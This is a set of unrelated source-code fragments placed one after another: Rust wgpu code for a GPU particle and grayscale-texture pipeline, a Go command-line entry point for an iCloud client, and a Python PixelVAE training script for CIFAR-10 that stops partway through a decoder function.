vertex_buffer_data[6 * i + 1] = 0.0;
vertex_buffer_data[6 * i + 2] = DOT_SIZE * (i as f32 * theta).cos();
vertex_buffer_data[6 * i + 3] = DOT_SIZE * (i as f32 * theta).sin();
vertex_buffer_data[6 * i + 4] = DOT_SIZE * ((i as f32 + 1.0) * theta).cos();
vertex_buffer_data[6 * i + 5] = DOT_SIZE * ((i as f32 + 1.0) * theta).sin();
}
device.create_buffer_init(&wgpu::util::BufferInitDescriptor {
label: Some("Vertex Buffer"),
contents: bytemuck::bytes_of(&vertex_buffer_data),
usage: wgpu::BufferUsages::VERTEX | wgpu::BufferUsages::COPY_DST,
})
}
fn create_particle_buffers(device: &wgpu::Device) -> Vec<wgpu::Buffer> {
let mut initial_particle_data: Vec<f32> = vec![0.0; (6 * NUM_PARTICLES) as usize];
let mut rng = rand::rngs::StdRng::seed_from_u64(333);
let unif = Uniform::new_inclusive(-1.0, 1.0);
for particle_instance_chunk in initial_particle_data.chunks_mut(6) {
particle_instance_chunk[0] = unif.sample(&mut rng);
particle_instance_chunk[1] = unif.sample(&mut rng);
particle_instance_chunk[2] = 0.0;
particle_instance_chunk[3] = 0.0;
particle_instance_chunk[4] = 0.0;
particle_instance_chunk[5] = 0.0;
}
let mut particle_buffers = Vec::<wgpu::Buffer>::new();
for i in 0..2 {
particle_buffers.push(
device.create_buffer_init(&wgpu::util::BufferInitDescriptor {
label: Some(&format!("Particle Buffer {}", i)),
contents: bytemuck::cast_slice(&initial_particle_data),
usage: wgpu::BufferUsages::VERTEX
| wgpu::BufferUsages::STORAGE
| wgpu::BufferUsages::COPY_DST
| wgpu::BufferUsages::MAP_READ,
}),
);
}
return particle_buffers;
}
fn create_parameter_buffer(device: &wgpu::Device, param_data: &Vec<f32>) -> wgpu::Buffer {
device.create_buffer_init(&wgpu::util::BufferInitDescriptor {
label: Some("Parameter Buffer"),
contents: bytemuck::cast_slice(¶m_data),
usage: wgpu::BufferUsages::UNIFORM | wgpu::BufferUsages::COPY_DST,
})
}
fn create_parameter_bind_group(
device: &wgpu::Device,
parameter_bind_group_layout: &wgpu::BindGroupLayout,
parameter_buffer: &wgpu::Buffer,
) -> wgpu::BindGroup {
device.create_bind_group(&wgpu::BindGroupDescriptor {
layout: ¶meter_bind_group_layout,
entries: &[wgpu::BindGroupEntry {
binding: 0,
resource: parameter_buffer.as_entire_binding(),
}],
label: None,
})
}
fn create_particle_bind_groups(
device: &wgpu::Device,
compute_bind_group_layout: &wgpu::BindGroupLayout,
particle_buffers: &Vec<wgpu::Buffer>,
) -> Vec<wgpu::BindGroup> {
let mut particle_bind_groups = Vec::<wgpu::BindGroup>::new();
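// Ping-pong setup: bind group i reads particle buffer i and writes buffer (i + 1) % 2,
// so the compute pass alternates source and destination buffers each frame.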
for i in 0..2 {
particle_bind_groups.push(device.create_bind_group(&wgpu::BindGroupDescriptor {
layout: &compute_bind_group_layout,
entries: &[
wgpu::BindGroupEntry {
binding: 0,
resource: particle_buffers[i].as_entire_binding(),
},
wgpu::BindGroupEntry {
binding: 1,
resource: particle_buffers[(i + 1) % 2].as_entire_binding(),
},
],
label: None,
}));
}
return particle_bind_groups;
}
fn compute_work_group_count(
(width, height): (u32, u32),
(workgroup_width, workgroup_height): (u32, u32),
) -> (u32, u32) {
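// Ceiling division: enough workgroups to cover the whole texture, e.g. a 500x500
// image with 16x16 workgroups needs 32x32 dispatches.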
let x = (width + workgroup_width - 1) / workgroup_width;
let y = (height + workgroup_height - 1) / workgroup_height;
return (x, y);
}
fn create_gray_texture(
device: &wgpu::Device,
queue: &wgpu::Queue,
input_image: &DynamicImage,
shader: &wgpu::ShaderModule,
texture_size: wgpu::Extent3d,
) -> wgpu::Texture {
let input_texture = device.create_texture(&wgpu::TextureDescriptor {
label: Some("input"),
size: texture_size,
mip_level_count: 1,
sample_count: 1,
dimension: wgpu::TextureDimension::D2,
format: wgpu::TextureFormat::Rgba8UnormSrgb,
usage: wgpu::TextureUsages::TEXTURE_BINDING | wgpu::TextureUsages::COPY_DST,
});
queue.write_texture(
input_texture.as_image_copy(),
&input_image.to_rgba8(),
wgpu::ImageDataLayout {
offset: 0,
bytes_per_row: std::num::NonZeroU32::new(4 * texture_size.width),
rows_per_image: std::num::NonZeroU32::new(texture_size.height),
},
texture_size,
);
let output_texture = device.create_texture(&wgpu::TextureDescriptor {
label: Some("gray texture"),
size: texture_size,
mip_level_count: 1,
sample_count: 1,
dimension: wgpu::TextureDimension::D2,
format: wgpu::TextureFormat::Rgba32Float,
usage: wgpu::TextureUsages::TEXTURE_BINDING | wgpu::TextureUsages::STORAGE_BINDING,
});
let pipeline = device.create_compute_pipeline(&wgpu::ComputePipelineDescriptor {
label: Some("grayscale pipeline"),
layout: None,
module: &shader,
entry_point: "main",
});
let bind_group = device.create_bind_group(&wgpu::BindGroupDescriptor {
label: Some("gray scale bind group"),
layout: &pipeline.get_bind_group_layout(0),
entries: &[
wgpu::BindGroupEntry {
binding: 0,
resource: wgpu::BindingResource::TextureView(
&input_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
wgpu::BindGroupEntry {
binding: 1,
resource: wgpu::BindingResource::TextureView(
&output_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
],
});
let mut encoder =
device.create_command_encoder(&wgpu::CommandEncoderDescriptor { label: None });
{
let (dispatch_width, dispatch_height) =
compute_work_group_count((texture_size.width, texture_size.height), (16, 16));
let mut compute_pass =
encoder.begin_compute_pass(&wgpu::ComputePassDescriptor { label: None });
compute_pass.set_pipeline(&pipeline);
compute_pass.set_bind_group(0, &bind_group, &[]);
compute_pass.dispatch(dispatch_width, dispatch_height, 1);
}
queue.submit(Some(encoder.finish()));
return output_texture;
}
fn create_cache_texture(
device: &wgpu::Device,
queue: &wgpu::Queue,
input_texture: &wgpu::Texture,
shader: &wgpu::ShaderModule,
texture_size: wgpu::Extent3d,
) -> wgpu::Texture {
let output_texture = device.create_texture(&wgpu::TextureDescriptor {
label: Some("cache texture"),
size: texture_size,
mip_level_count: 1,
sample_count: 1,
dimension: wgpu::TextureDimension::D2,
format: wgpu::TextureFormat::Rgba32Float,
usage: wgpu::TextureUsages::TEXTURE_BINDING | wgpu::TextureUsages::STORAGE_BINDING,
});
let param = vec![BLANK_LEVEL, NUM_PARTICLES as f32 * Q_CHARGE];
let param_buffer = device.create_buffer_init(&wgpu::util::BufferInitDescriptor {
label: Some("cache param buffer"),
contents: bytemuck::cast_slice(¶m),
usage: wgpu::BufferUsages::UNIFORM | wgpu::BufferUsages::COPY_DST,
});
let bind_group_layout = device.create_bind_group_layout(&wgpu::BindGroupLayoutDescriptor {
entries: &[
wgpu::BindGroupLayoutEntry {
binding: 0,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Buffer {
ty: wgpu::BufferBindingType::Uniform,
has_dynamic_offset: false,
min_binding_size: wgpu::BufferSize::new(
(param.len() * mem::size_of::<f32>()) as _,
),
},
count: None,
},
wgpu::BindGroupLayoutEntry {
binding: 1,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::Texture {
multisampled: false,
view_dimension: wgpu::TextureViewDimension::D2,
sample_type: wgpu::TextureSampleType::Float { filterable: false },
},
count: None,
},
wgpu::BindGroupLayoutEntry {
binding: 2,
visibility: wgpu::ShaderStages::COMPUTE,
ty: wgpu::BindingType::StorageTexture {
access: wgpu::StorageTextureAccess::WriteOnly,
view_dimension: wgpu::TextureViewDimension::D2,
format: wgpu::TextureFormat::Rgba32Float,
},
count: None,
},
],
label: Some("cache bind group layout"),
});
let bind_group = device.create_bind_group(&wgpu::BindGroupDescriptor {
label: Some("cache scale bind group"),
layout: &bind_group_layout,
entries: &[
wgpu::BindGroupEntry {
binding: 0,
resource: param_buffer.as_entire_binding(),
},
wgpu::BindGroupEntry {
binding: 1,
resource: wgpu::BindingResource::TextureView(
&input_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
wgpu::BindGroupEntry {
binding: 2,
resource: wgpu::BindingResource::TextureView(
&output_texture.create_view(&wgpu::TextureViewDescriptor::default()),
),
},
],
});
let pipeline = device.create_compute_pipeline(&wgpu::ComputePipelineDescriptor {
label: Some("cache pipeline"),
layout: Some(
&device.create_pipeline_layout(&wgpu::PipelineLayoutDescriptor {
label: Some("cache pipeline layout"),
bind_group_layouts: &[&bind_group_layout],
push_constant_ranges: &[],
}),
),
module: &shader,
entry_point: "main",
});
let mut encoder =
device.create_command_encoder(&wgpu::CommandEncoderDescriptor { label: None });
{
let (dispatch_width, dispatch_height) =
compute_work_group_count((texture_size.width, texture_size.height), (16, 16));
let mut compute_pass =
encoder.begin_compute_pass(&wgpu::ComputePassDescriptor { label: None });
compute_pass.set_pipeline(&pipeline);
compute_pass.set_bind_group(0, &bind_group, &[]);
compute_pass.dispatch(dispatch_width, dispatch_height, 1);
}
queue.submit(Some(encoder.finish()));
return output_texture;
}
fn save_gif(path: &str, frames: &mut Vec<Vec<u8>>, speed: i32, size: u16) -> anyhow::Result<()> {
use gif::{Encoder, Frame, Repeat};
let mut image = std::fs::File::create(path)?;
let mut encoder = Encoder::new(&mut image, size, size, &[])?;
encoder.set_repeat(Repeat::Infinite)?;
for mut frame in frames {
encoder.write_frame(&Frame::from_rgba_speed(size, size, &mut frame, speed))?;
}
Ok(())
}
fn padded_bytes_per_row(width: u32) -> usize {
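// wgpu requires texture-to-buffer copies to have rows aligned to
// COPY_BYTES_PER_ROW_ALIGNMENT (256 bytes); e.g. width 300 -> 1200 unpadded bytes
// per row -> 80 bytes of padding -> 1280 padded bytes per row.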
let bytes_per_row = width as usize * 4;
let padding = (256 - bytes_per_row % 256) % 256;
bytes_per_row + padding
}
| main |
main.go | package main
import (
"fmt"
"os"
cli "github.com/jawher/mow.cli"
)
// Provisioned by ldflags
// nolint: gochecknoglobals
var (
version string
commitHash string
buildDate string
)
var verbose *bool
func main() | {
app := cli.App("igo", "iCloud Client in go")
app.Spec = "[-v]"
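// The spec string limits top-level arguments to the optional -v flag; each subcommand declares its own spec.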
verbose = app.BoolOpt("v verbose", false, "Verbose debug mode")
app.Before = func() {
if *verbose {
// TODO: enable verbose
fmt.Println("Verbose mode enabled")
}
configure()
}
app.Command("login", "iCloud login", loginCmd)
app.Command("drive", "iCloud Drive", driveCmd)
app.Command("version", "version", func(cmd *cli.Cmd) {
cmd.Action = func() {
fmt.Printf("%s version %s (%s) built on %s\n", friendlyAppName, version, commitHash, buildDate)
}
})
app.Run(os.Args)
} |
|
cifarinterpolation1_filter_3_mean_beta_largesample.py | """
PixelVAE: A Latent Variable Model for Natural Images
Ishaan Gulrajani, Kundan Kumar, Faruk Ahmed, Adrien Ali Taiga, Francesco Visin, David Vazquez, Aaron Courville
"""
import os, sys
sys.path.append(os.getcwd())
N_GPUS = 2
import random
import tflib as lib
import tflib.sampling_loop_cifar_filter_3
import tflib.ops.kl_unit_gaussian
import tflib.ops.kl_gaussian_gaussian
import tflib.ops.conv2d
import tflib.ops.linear
import tflib.ops.batchnorm
import tflib.ops.embedding
import tflib.cifar
import tflib.cifar_256
import numpy as np
import tensorflow as tf
import imageio
from imageio import imsave
import keras
import time
import functools
import sklearn
from sklearn.model_selection import train_test_split
DATASET = 'cifar10' # mnist_256
SETTINGS = '32px_cifar' # mnist_256, 32px_small, 32px_big, 64px_small, 64px_big
OUT_DIR = DATASET + '_interpolation1_final_filter_3_mean_beta_largesample'
if not os.path.isdir(OUT_DIR):
os.makedirs(OUT_DIR)
print "Created directory {}".format(OUT_DIR)
if SETTINGS == 'mnist_256':
from keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# two_level uses Enc1/Dec1 for the bottom level, Enc2/Dec2 for the top level
# one_level uses EncFull/DecFull for the bottom (and only) level
MODE = 'one_level'
# Whether to treat pixel inputs to the model as real-valued (as in the
# original PixelCNN) or discrete (gets better likelihoods).
EMBED_INPUTS = True
# Turn on/off the bottom-level PixelCNN in Dec1/DecFull
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 32
DIM_1 = 16
DIM_2 = 32
DIM_3 = 32
DIM_4 = 64
LATENT_DIM_2 = 128
NUM_CLASSES = 10
ALPHA1_ITERS = 5000
ALPHA2_ITERS = 5000
KL_PENALTY = 1.0
BETA_ITERS = 1000
# In Dec2, we break each spatial location into N blocks (analogous to channels
# in the original PixelCNN) and model each spatial location autoregressively
# as P(x)=P(x0)*P(x1|x0)*P(x2|x0,x1)... In my experiments values of N > 1
# actually hurt performance. Unsure why; might be a bug.
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 2*500,
'stop_after': 500*500,
'callback_every': 10*500
}
LR = 1e-3
LR_DECAY_AFTER = TIMES['stop_after']
LR_DECAY_FACTOR = 1.
BATCH_SIZE = 100
N_CHANNELS = 1
HEIGHT = 28
WIDTH = 28
# These aren't actually used for one-level models but some parts
# of the code still depend on them being defined.
LATENT_DIM_1 = 64
LATENTS1_HEIGHT = 7
LATENTS1_WIDTH = 7
elif SETTINGS == '32px_small':
MODE = 'two_level'
EMBED_INPUTS = True
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 128
DIM_1 = 64
DIM_2 = 128
DIM_3 = 256
LATENT_DIM_1 = 64
DIM_PIX_2 = 512
DIM_4 = 512
LATENT_DIM_2 = 512
ALPHA1_ITERS = 2000
ALPHA2_ITERS = 5000
KL_PENALTY = 1.00
BETA_ITERS = 1000
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 1000,
'stop_after': 200000,
'callback_every': 20000
}
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = 1e-1
BATCH_SIZE = 64
N_CHANNELS = 3
HEIGHT = 32
WIDTH = 32
LATENTS1_HEIGHT = 8
LATENTS1_WIDTH = 8
elif SETTINGS == '32px_big':
MODE = 'two_level'
EMBED_INPUTS = False
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 256
DIM_1 = 128
DIM_2 = 256
DIM_3 = 512
LATENT_DIM_1 = 128
DIM_PIX_2 = 512
DIM_4 = 512
LATENT_DIM_2 = 512
ALPHA1_ITERS = 2000
ALPHA2_ITERS = 5000
KL_PENALTY = 1.00
BETA_ITERS = 1000
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 1000,
'stop_after': 300000,
'callback_every': 20000
}
VANILLA = False
LR = 1e-3
LR_DECAY_AFTER = 300000
LR_DECAY_FACTOR = 1e-1
BATCH_SIZE = 64
N_CHANNELS = 3
HEIGHT = 32
WIDTH = 32
LATENTS1_HEIGHT = 8
LATENTS1_WIDTH = 8
elif SETTINGS == '64px_small':
MODE = 'two_level'
EMBED_INPUTS = True
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 128
DIM_0 = 64
DIM_1 = 64
DIM_2 = 128
LATENT_DIM_1 = 64
DIM_PIX_2 = 256
DIM_3 = 256
DIM_4 = 512
LATENT_DIM_2 = 512
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 10000,
'stop_after': 200000,
'callback_every': 50000
}
VANILLA = False
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = .1
ALPHA1_ITERS = 2000
ALPHA2_ITERS = 10000
KL_PENALTY = 1.0
BETA_ITERS = 1000
BATCH_SIZE = 64
N_CHANNELS = 3
HEIGHT = 64
WIDTH = 64
LATENTS1_WIDTH = 16
LATENTS1_HEIGHT = 16
elif SETTINGS == '64px_big':
MODE = 'two_level'
EMBED_INPUTS = True
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 384
DIM_0 = 192
DIM_1 = 256
DIM_2 = 512
LATENT_DIM_1 = 64
DIM_PIX_2 = 512
DIM_3 = 512
DIM_4 = 512
LATENT_DIM_2 = 512
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 10000,
'stop_after': 400000,
'callback_every': 50000
}
VANILLA = False
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = .5
ALPHA1_ITERS = 1000
ALPHA2_ITERS = 10000
KL_PENALTY = 1.00
BETA_ITERS = 500
BATCH_SIZE = 48
N_CHANNELS = 3
HEIGHT = 64
WIDTH = 64
LATENTS1_WIDTH = 16
LATENTS1_HEIGHT = 16
elif SETTINGS=='64px_big_onelevel':
# two_level uses Enc1/Dec1 for the bottom level, Enc2/Dec2 for the top level
# one_level uses EncFull/DecFull for the bottom (and only) level
MODE = 'one_level'
# Whether to treat pixel inputs to the model as real-valued (as in the
# original PixelCNN) or discrete (gets better likelihoods).
EMBED_INPUTS = True
# Turn on/off the bottom-level PixelCNN in Dec1/DecFull
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 384
DIM_0 = 192
DIM_1 = 256
DIM_2 = 512
DIM_3 = 512
DIM_4 = 512
LATENT_DIM_2 = 512
ALPHA1_ITERS = 50000
ALPHA2_ITERS = 50000
KL_PENALTY = 1.0
BETA_ITERS = 1000
# In Dec2, we break each spatial location into N blocks (analogous to channels
# in the original PixelCNN) and model each spatial location autoregressively
# as P(x)=P(x0)*P(x1|x0)*P(x2|x0,x1)... In my experiments values of N > 1
# actually hurt performance. Unsure why; might be a bug.
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 10000,
'stop_after': 400000,
'callback_every': 50000
}
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = 0.5
BATCH_SIZE = 48
N_CHANNELS = 3
HEIGHT = 64
WIDTH = 64
# These aren't actually used for one-level models but some parts
# of the code still depend on them being defined.
LATENT_DIM_1 = 64
LATENTS1_HEIGHT = 7
LATENTS1_WIDTH = 7
elif SETTINGS=='32px_cifar':
from keras.datasets import cifar10
(x_train_set, y_train_set), (x_test_set, y_test_set) = cifar10.load_data()
x_train_set = x_train_set.transpose(0,3,1,2)
x_test_set = x_test_set.transpose(0,3,1,2)
seed = 333
x_train_set, x_dev_set, y_train_set, y_dev_set = train_test_split(x_train_set, y_train_set, test_size=0.1, random_state=seed)
# two_level uses Enc1/Dec1 for the bottom level, Enc2/Dec2 for the top level
# one_level uses EncFull/DecFull for the bottom (and only) level
MODE = 'one_level'
# Whether to treat pixel inputs to the model as real-valued (as in the
# original PixelCNN) or discrete (gets better likelihoods).
EMBED_INPUTS = True
# Turn on/off the bottom-level PixelCNN in Dec1/DecFull
PIXEL_LEVEL_PIXCNN = True
HIGHER_LEVEL_PIXCNN = True
DIM_EMBED = 16
DIM_PIX_1 = 192 #LEILA EDIT: was previously 384
DIM_0 = 96 #LEILA EDIT: was previously 192
DIM_1 = 128 #LEILA EDIT: was previously 256
DIM_2 = 256 #LEILA EDIT: was previously 512
DIM_3 = 256 #LEILA EDIT: was previously 512
DIM_4 = 256 #LEILA EDIT: was previously 512
LATENT_DIM_2 = 256 #LEILA EDIT: was previously 512
ALPHA1_ITERS = 50000
ALPHA2_ITERS = 50000
KL_PENALTY = 1.0
BETA_ITERS = 1000
# In Dec2, we break each spatial location into N blocks (analogous to channels
# in the original PixelCNN) and model each spatial location autoregressively
# as P(x)=P(x0)*P(x1|x0)*P(x2|x0,x1)... In my experiments values of N > 1
# actually hurt performance. Unsure why; might be a bug.
PIX_2_N_BLOCKS = 1
TIMES = {
'test_every': 10000,
'stop_after': 400000,
'callback_every': 50000
}
LR = 1e-3
LR_DECAY_AFTER = 180000
LR_DECAY_FACTOR = 0.5
BATCH_SIZE = 50 # 48
N_CHANNELS = 3
HEIGHT = 32 #64
WIDTH = 32 #64
NUM_CLASSES = 10
# These aren't actually used for one-level models but some parts
# of the code still depend on them being defined.
LATENT_DIM_1 = 32 #LEILAEDIT: was previously 64
LATENTS1_HEIGHT = 7
LATENTS1_WIDTH = 7
if DATASET == 'mnist_256':
train_data, dev_data, test_data = lib.mnist_256.load(BATCH_SIZE, BATCH_SIZE) # TODO: define new data-loader so I don't load batches
elif DATASET == 'lsun_32':
train_data, dev_data = lib.lsun_bedrooms.load(BATCH_SIZE, downsample=True)
elif DATASET == 'lsun_64':
train_data, dev_data = lib.lsun_bedrooms.load(BATCH_SIZE, downsample=False)
elif DATASET == 'imagenet_64':
train_data, dev_data = lib.small_imagenet.load(BATCH_SIZE)
elif DATASET == 'cifar10':
train_data, dev_data, test_data = lib.cifar_256.load(BATCH_SIZE) #LEILAEDIT
lib.print_model_settings(locals().copy())
DEVICES = ['/gpu:{}'.format(i) for i in xrange(N_GPUS)]
lib.ops.conv2d.enable_default_weightnorm()
lib.ops.linear.enable_default_weightnorm()
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as session:
bn_is_training = tf.placeholder(tf.bool, shape=None, name='bn_is_training')
bn_stats_iter = tf.placeholder(tf.int32, shape=None, name='bn_stats_iter')
total_iters = tf.placeholder(tf.int32, shape=None, name='total_iters')
all_images = tf.placeholder(tf.int32, shape=[None, N_CHANNELS, HEIGHT, WIDTH], name='all_images')
all_latents1 = tf.placeholder(tf.float32, shape=[None, LATENT_DIM_1, LATENTS1_HEIGHT, LATENTS1_WIDTH], name='all_latents1')
split_images = tf.split(all_images, len(DEVICES), axis=0)
split_latents1 = tf.split(all_latents1, len(DEVICES), axis=0)
tower_cost = []
tower_outputs1_sample = []
for device_index, (device, images, latents1_sample) in enumerate(zip(DEVICES, split_images, split_latents1)):
with tf.device(device):
def nonlinearity(x):
return tf.nn.elu(x)
def pixcnn_gated_nonlinearity(a, b):
return tf.sigmoid(a) * tf.tanh(b)
def SubpixelConv2D(*args, **kwargs):
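# Sub-pixel (pixel-shuffle) upsampling: emit 4x the channels, then depth_to_space
# rearranges them into a 2x larger spatial grid; the transposes convert between
# NCHW and NHWC for TensorFlow's depth_to_space.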
kwargs['output_dim'] = 4*kwargs['output_dim']
output = lib.ops.conv2d.Conv2D(*args, **kwargs)
output = tf.transpose(output, [0,2,3,1])
output = tf.depth_to_space(output, 2)
output = tf.transpose(output, [0,3,1,2])
return output
def ResidualBlock(name, input_dim, output_dim, inputs, filter_size, mask_type=None, resample=None, he_init=True):
"""
resample: None, 'down', or 'up'
"""
if mask_type != None and resample != None:
raise Exception('Unsupported configuration')
if resample=='down':
conv_shortcut = functools.partial(lib.ops.conv2d.Conv2D, stride=2)
conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=input_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim, stride=2)
elif resample=='up':
conv_shortcut = SubpixelConv2D
conv_1 = functools.partial(SubpixelConv2D, input_dim=input_dim, output_dim=output_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)
elif resample==None:
conv_shortcut = lib.ops.conv2d.Conv2D
conv_1 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=input_dim, output_dim=output_dim)
conv_2 = functools.partial(lib.ops.conv2d.Conv2D, input_dim=output_dim, output_dim=output_dim)
else:
raise Exception('invalid resample value')
if output_dim==input_dim and resample==None:
shortcut = inputs # Identity skip-connection
else:
shortcut = conv_shortcut(name+'.Shortcut', input_dim=input_dim, output_dim=output_dim, filter_size=1, mask_type=mask_type, he_init=False, biases=True, inputs=inputs)
output = inputs
if mask_type == None:
output = nonlinearity(output)
output = conv_1(name+'.Conv1', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init, weightnorm=False)
output = nonlinearity(output)
output = conv_2(name+'.Conv2', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init, weightnorm=False, biases=False)
if device_index == 0:
output = lib.ops.batchnorm.Batchnorm(name+'.BN', [0,2,3], output, bn_is_training, bn_stats_iter)
else:
output = lib.ops.batchnorm.Batchnorm(name+'.BN', [0,2,3], output, bn_is_training, bn_stats_iter, update_moving_stats=False)
else:
output = nonlinearity(output)
output_a = conv_1(name+'.Conv1A', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
output_b = conv_1(name+'.Conv1B', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
output = pixcnn_gated_nonlinearity(output_a, output_b)
output = conv_2(name+'.Conv2', filter_size=filter_size, mask_type=mask_type, inputs=output, he_init=he_init)
return shortcut + output
def Enc1(images):
output = images
if WIDTH == 64:
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('Enc1.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_0, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Enc1.InputRes0', input_dim=DIM_0, output_dim=DIM_0, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.InputRes', input_dim=DIM_0, output_dim=DIM_1, filter_size=3, resample='down', inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Enc1.Input', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Enc1.InputRes', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample='down', inputs=output)
else:
if EMBED_INPUTS:
output = lib.ops.conv2d.Conv2D('Enc1.Input', input_dim=N_CHANNELS*DIM_EMBED, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
else:
output = lib.ops.conv2d.Conv2D('Enc1.Input', input_dim=N_CHANNELS, output_dim=DIM_1, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Enc1.Res1Pre', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res1Pre2', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res1', input_dim=DIM_1, output_dim=DIM_2, filter_size=3, resample='down', inputs=output)
if LATENTS1_WIDTH == 16:
output = ResidualBlock('Enc1.Res4Pre', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res4', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res4Post', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
mu_and_sigma = lib.ops.conv2d.Conv2D('Enc1.Out', input_dim=DIM_2, output_dim=2*LATENT_DIM_1, filter_size=1, inputs=output, he_init=False)
else:
output = ResidualBlock('Enc1.Res2Pre', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res2Pre2', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res2', input_dim=DIM_2, output_dim=DIM_3, filter_size=3, resample='down', inputs=output)
output = ResidualBlock('Enc1.Res3Pre', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res3Pre2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Enc1.Res3Pre3', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
mu_and_sigma = lib.ops.conv2d.Conv2D('Enc1.Out', input_dim=DIM_3, output_dim=2*LATENT_DIM_1, filter_size=1, inputs=output, he_init=False)
return mu_and_sigma, output
def Dec1(latents, images):
output = tf.clip_by_value(latents, -50., 50.)
if LATENTS1_WIDTH == 16:
output = lib.ops.conv2d.Conv2D('Dec1.Input', input_dim=LATENT_DIM_1, output_dim=DIM_2, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Dec1.Res1A', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res1B', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res1C', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
else:
output = lib.ops.conv2d.Conv2D('Dec1.Input', input_dim=LATENT_DIM_1, output_dim=DIM_3, filter_size=1, inputs=output, he_init=False)
output = ResidualBlock('Dec1.Res1', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res1Post', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res1Post2', input_dim=DIM_3, output_dim=DIM_3, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res2', input_dim=DIM_3, output_dim=DIM_2, filter_size=3, resample='up', inputs=output)
output = ResidualBlock('Dec1.Res2Post', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res2Post2', input_dim=DIM_2, output_dim=DIM_2, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res3', input_dim=DIM_2, output_dim=DIM_1, filter_size=3, resample='up', inputs=output)
output = ResidualBlock('Dec1.Res3Post', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
output = ResidualBlock('Dec1.Res3Post2', input_dim=DIM_1, output_dim=DIM_1, filter_size=3, resample=None, inputs=output)
if WIDTH == 64:
output = ResidualBlock('Dec1.Res4', input_dim=DIM_1, output_dim=DIM_0, filter_size=3, resample='up', inputs=output)
output = ResidualBlock('Dec1.Res4Post', input_dim=DIM_0, output_dim=DIM_0, filter_size=3, resample=None, inputs=output)
if PIXEL_LEVEL_PIXCNN:
if WIDTH == 64:
if EMBED_INPUTS:
